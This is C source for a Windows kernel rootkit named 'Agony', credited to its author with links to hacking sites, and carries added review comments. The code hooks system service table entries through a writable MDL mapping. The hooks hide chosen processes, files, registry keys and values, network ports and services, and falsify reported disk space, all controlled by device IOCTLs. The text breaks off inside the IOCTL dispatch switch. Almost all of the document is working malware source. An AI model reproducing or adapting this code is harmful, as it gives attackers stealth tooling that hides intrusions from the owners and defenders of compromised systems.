/*
Agony rootkit
by Intox
visit: -spiritofhack.net
-undergroundkonnekt.net
*/
#include <ntddk.h>
#include "process.h"
#include "file.h"
#include "reg.h"
#include "port.h"
#include "disk.h"
#include "service.h"
#include "codemsg.h"
// Capacity of each WCHAR* table declared below (they are sized [128]);
// AddObjectToHide refuses new entries once a table holds this many.
#define MAX_HIDDEN_OBJECT 128
// device definition: the kernel device name and the user-visible symbolic
// link; the link is deleted again in Unload.
#define DEVICE L"\\Device\\agony"
#define DOSDEVICE L"\\DosDevices\\agony"
// one-byte boolean used for the *Hooked and MDLinit flags below
typedef unsigned char BOOL;
// SSDT type: the layout this file assumes for the exported
// KeServiceDescriptorTable. ServiceTableBase is an array of service routine
// addresses indexed by system call number; NumberOfServices is its length
// (initMDL uses it to size the MDL).
typedef struct SERVICE_DESCRIPTOR_ENTRY
{
unsigned int *ServiceTableBase;
unsigned int *ServiceCounterTableBase;
unsigned int NumberOfServices;
unsigned char *ParamTableBase;
} SERVICE_DESCRIPTOR_ENTRY,*PSERVICE_DESCRIPTOR_ENTRY;
// Imported from the kernel image. NOTE(review): every 4-byte assumption in
// this file (NumberOfServices*4 in initMDL, the LONG casts in the macros)
// only holds for a 32-bit kernel.
__declspec(dllimport) SERVICE_DESCRIPTOR_ENTRY KeServiceDescriptorTable;
// MDL over the service table and the alias it is mapped to. Both are set up
// in initMDL and torn down in removeHooks; all writes to the table go through
// MappedSystemCallTable, never through ServiceTableBase directly.
// (From a defender's view this is the detectable artifact: an extra mapping of
// the service table plus entries that no longer point into the kernel image.)
PMDL g_pmdlSystemCall;
PVOID *MappedSystemCallTable;
// macros to install & uninstall hooks
// SYSTEMSERVICE / SYSCALL_INDEX read the 32-bit value at byte offset 1 of the
// routine passed in, i.e. they assume the Zw* stub starts with a
// "mov eax, <index>" instruction (as on 32-bit x86 kernels).
// NOTE(review): the index is never range-checked against NumberOfServices.
#define SYSTEMSERVICE(_function) \
KeServiceDescriptorTable.ServiceTableBase[*(PULONG)((PUCHAR)_function+1)]
#define SYSCALL_INDEX(_Function) *(PULONG)((PUCHAR)_Function+1)
// HOOK_SYSCALL atomically swaps the table entry for _Function with _Hook and
// keeps the previous value in _Orig; UNHOOK_SYSCALL writes _Orig back and
// ignores its _Hook argument. Both write through the MDL mapping.
#define HOOK_SYSCALL(_Function, _Hook, _Orig ) \
_Orig = (PVOID) InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)
#define UNHOOK_SYSCALL(_Function, _Hook, _Orig ) \
InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Orig)
// Device object created elsewhere (not in this excerpt); deleted in Unload.
PDEVICE_OBJECT DriverDeviceObject = NULL;
// Set by initMDL, cleared by removeHooks; nothing in this excerpt reads it.
BOOL MDLinit = FALSE;
// hooked native APIs: the saved original entry points, defined in the
// per-feature modules pulled in by the headers above; removeHooks restores them.
extern ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformationAddress;
extern ZWQUERYDIRECTORYFILE ZwQueryDirectoryFileAddress;
extern ZWENUMERATEKEY ZwEnumerateKeyAddress;
extern ZWENUMERATEVALUEKEY ZwEnumerateValueKeyAddress;
extern ZWDEVICEIOCONTROLFILE ZwDeviceIoControlFileAddress;
extern ZWQUERYVOLUMEINFORMATIONFILE ZwQueryVolumeInformationFileAddress;
// Booleans recording which hooks are in place, so removeHooks only restores
// entries this driver actually replaced.
BOOL ZwQuerySystemInformationHooked = FALSE;
BOOL ZwQueryDirectoryFileHooked = FALSE;
BOOL ZwEnumerateKeyHooked = FALSE;
BOOL ZwEnumerateValueKeyHooked = FALSE;
BOOL ZwDeviceIoControlFileHooked = FALSE;
BOOL ZwQueryVolumeInformationFileHooked = FALSE;
// Tables of hidden objects, owned by the per-feature modules. The four WCHAR*
// tables hold pool copies made by AddObjectToHide and freed in Unload; their
// [128] size matches MAX_HIDDEN_OBJECT. The port tables are [1024]; no limit
// macro for them is visible in this file.
extern WCHAR *ProcessToHide[128];
extern WCHAR *FileToHide[128];
extern WCHAR *RegKeyToHide[128];
extern WCHAR *RegValueToHide[128];
extern USHORT TcpPortToHide[1024];
extern USHORT UdpPortToHide[1024];
extern WCHAR ServiceToHide[256];
// Number of entries currently stored in each table above.
extern ULONG NbProcessToHide;
extern ULONG NbFileToHide;
extern ULONG NbRegKeyToHide;
extern ULONG NbRegValueToHide;
extern ULONG NbTcpPortToHide;
extern ULONG NbUdpPortToHide;
// space disk falsification: one slot per drive letter. Presumably
// SpaceToHide[i] is the amount reported as missing for HardDrives[i]; the
// logic lives in disk.h and is not visible here.
extern WCHAR HardDrives[26];
extern ULONG SpaceToHide[26];
// Create a second, writable kernel mapping of the system service table so the
// HOOK_SYSCALL / UNHOOK_SYSCALL macros can write to it via
// MappedSystemCallTable. Returns STATUS_UNSUCCESSFUL if the MDL cannot be
// created, STATUS_SUCCESS otherwise. Undone by removeHooks.
NTSTATUS initMDL()
{
// map memory into our domain
// NOTE(review): NumberOfServices*4 assumes 4-byte table entries (32-bit kernel).
g_pmdlSystemCall = MmCreateMdl(NULL, KeServiceDescriptorTable.ServiceTableBase,
KeServiceDescriptorTable.NumberOfServices*4);
if(!g_pmdlSystemCall)
return STATUS_UNSUCCESSFUL;
// the MDL must be built before it can be mapped below
MmBuildMdlForNonPagedPool(g_pmdlSystemCall);
// change MDL permissions
// NOTE(review): MdlFlags is documented as opaque to drivers; poking
// MDL_MAPPED_TO_SYSTEM_VA in by hand is relying on an internal detail that a
// different kernel build need not honour.
g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;
// NOTE(review): the return value is not checked. A NULL mapping would be
// dereferenced by the first HOOK_SYSCALL, and on that path the MDL created
// above is never freed (removeHooks only frees it if the pointer is set, and
// would also pass the NULL mapping to MmUnmapLockedPages).
MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode);
// flag is set even if the mapping above failed
MDLinit = TRUE;
return STATUS_SUCCESS;
}
// Restore every service-table entry this driver replaced (guarded by the
// per-hook *Hooked flags), then release the MDL mapping created by initMDL.
// Called from Unload. Note the *Hooked flags are not cleared here.
void removeHooks()
{
//DbgPrint("removeHooks()");
// NOTE(review): cli only masks interrupts on the current processor; it does
// not stop other processors from running through the table concurrently,
// and each InterlockedExchange is already atomic on its own.
__asm cli
// replace original addresses
// (the second macro argument, the hook routine, is ignored by UNHOOK_SYSCALL)
if( ZwQuerySystemInformationHooked )
UNHOOK_SYSCALL( ZwQuerySystemInformation,
ZwQuerySystemInformationHook,
ZwQuerySystemInformationAddress );
if( ZwQueryDirectoryFileHooked )
UNHOOK_SYSCALL( ZwQueryDirectoryFile,
ZwQueryDirectoryFileHook,
ZwQueryDirectoryFileAddress );
if( ZwEnumerateKeyHooked )
UNHOOK_SYSCALL( ZwEnumerateKey,
ZwEnumerateKeyHook,
ZwEnumerateKeyAddress );
if( ZwEnumerateValueKeyHooked )
UNHOOK_SYSCALL( ZwEnumerateValueKey,
ZwEnumerateValueKeyHook,
ZwEnumerateValueKeyAddress );
if( ZwDeviceIoControlFileHooked )
UNHOOK_SYSCALL( ZwDeviceIoControlFile,
ZwDeviceIoControlFileHook,
ZwDeviceIoControlFileAddress );
if( ZwQueryVolumeInformationFileHooked )
UNHOOK_SYSCALL( ZwQueryVolumeInformationFile,
ZwQueryVolumeInformationFileHook,
ZwQueryVolumeInformationFileAddress );
__asm sti
// free the MDL: the mapping must be released before the MDL itself.
// NOTE(review): g_pmdlSystemCall is not reset to NULL afterwards, so a second
// call would unmap and free it again; this excerpt shows only one caller.
if(g_pmdlSystemCall) {
MmUnmapLockedPages(MappedSystemCallTable, g_pmdlSystemCall);
IoFreeMdl(g_pmdlSystemCall);
}
MDLinit = FALSE;
return;
}
// Driver unload routine: remove the hooks, free the pool copies stored in the
// *ToHide tables, undo the service-manager hiding, and delete the symbolic
// link and device object. DriverObject is not used by this body.
void Unload(IN PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING DosDeviceName;
ULONG i;
//DbgPrint("Unloading driver...");
removeHooks();
// free memory: each entry is a pool copy allocated by AddObjectToHide.
// The Nb* counters are left as they are, which is fine at unload time.
for(i=0; i<NbProcessToHide; i++)
ExFreePool( ProcessToHide[i] );
for(i=0; i<NbFileToHide; i++)
ExFreePool( FileToHide[i] );
for(i=0; i<NbRegKeyToHide; i++)
ExFreePool( RegKeyToHide[i] );
for(i=0; i<NbRegValueToHide; i++)
ExFreePool( RegValueToHide[i] );
// replace hidden services (implemented in service.h's module)
UnhideFromSCManager();
// delete symbolic links (the NTSTATUS of IoDeleteSymbolicLink is ignored)
RtlInitUnicodeString(&DosDeviceName, DOSDEVICE);
IoDeleteSymbolicLink( &DosDeviceName );
// delete device, if it was created (creation is not in this excerpt)
if( DriverDeviceObject != NULL )
IoDeleteDevice( DriverDeviceObject );
}
// function to dispatch the IRPs
/*
 * Minimal IRP handler: completes the request with STATUS_SUCCESS and returns
 * the same status. DeviceObject is not used. Which major functions this is
 * registered for is decided outside this excerpt.
 * NOTE(review): IoStatus.Information is left untouched, so callers of a
 * read/write-style request would see whatever value was already there.
 */
NTSTATUS IODispatch(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
    const NTSTATUS result = STATUS_SUCCESS;

    Irp->IoStatus.Status = result;
    /* The IRP must not be touched after completion; return the local copy. */
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return result;
}
/*
 * Append a pool copy of the wide string Object to the table Tab (which holds
 * *Nb entries and has MAX_HIDDEN_OBJECT slots), unless an identical string is
 * already present.
 *
 * On success *Nb is incremented and *status is left untouched. When the
 * allocation fails, Tab[*Nb] is set to NULL, *status is set to
 * STATUS_INSUFFICIENT_RESOURCES and *Nb is not incremented. A full table is
 * silently ignored (*status untouched).
 *
 * NOTE(review): wcslen(Object) walks until a NUL terminator. The only caller
 * visible here (IOManager) hands in the IRP system buffer; whether a
 * terminator within the input buffer length is guaranteed is not visible in
 * this excerpt and should be verified, since an unterminated buffer would be
 * read past its end here.
 */
void AddObjectToHide( WCHAR **Tab, PULONG Nb, WCHAR *Object, PNTSTATUS status )
{
    ULONG count = *Nb;
    SIZE_T bytes = (wcslen(Object) + 1) * sizeof(WCHAR);
    ULONG idx;
    WCHAR *copy;

    /* Already hidden? Same byte length and identical contents (terminator included). */
    for (idx = 0; idx < count; idx++) {
        SIZE_T existing = (wcslen(Tab[idx]) + 1) * sizeof(WCHAR);
        if (existing == bytes && memcmp(Object, Tab[idx], bytes) == 0) {
            return;
        }
    }

    /* No free slot: dropped without reporting, as in the original design. */
    if (count >= MAX_HIDDEN_OBJECT) {
        return;
    }

    copy = (WCHAR*)ExAllocatePool(PagedPool, bytes);
    Tab[count] = copy;
    if (copy == NULL) {
        /* Per MSDN: report STATUS_INSUFFICIENT_RESOURCES when the pool allocation fails. */
        *status = STATUS_INSUFFICIENT_RESOURCES;
        return;
    }

    memcpy(copy, Object, bytes);
    *Nb = count + 1;
}
// routine that will install the hooks
NTSTATUS IOManager(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
PIO_STACK_LOCATION StackLocation = IoGetCurrentIrpStackLocation(Irp);
ULONG IRPcode = StackLocation->Parameters.DeviceIoControl.IoControlCode;
WCHAR *buf;
SIZE_T size;
ULONG i;
PUSHORT port;
BOOL hidden = FALSE;
buf = (WCHAR*)Irp->AssociatedIrp.SystemBuffer;
Irp->IoStatus.Status = STATUS_SUCCESS;
switch( IRPcode ) {
case CODEMSG(NO_MSG):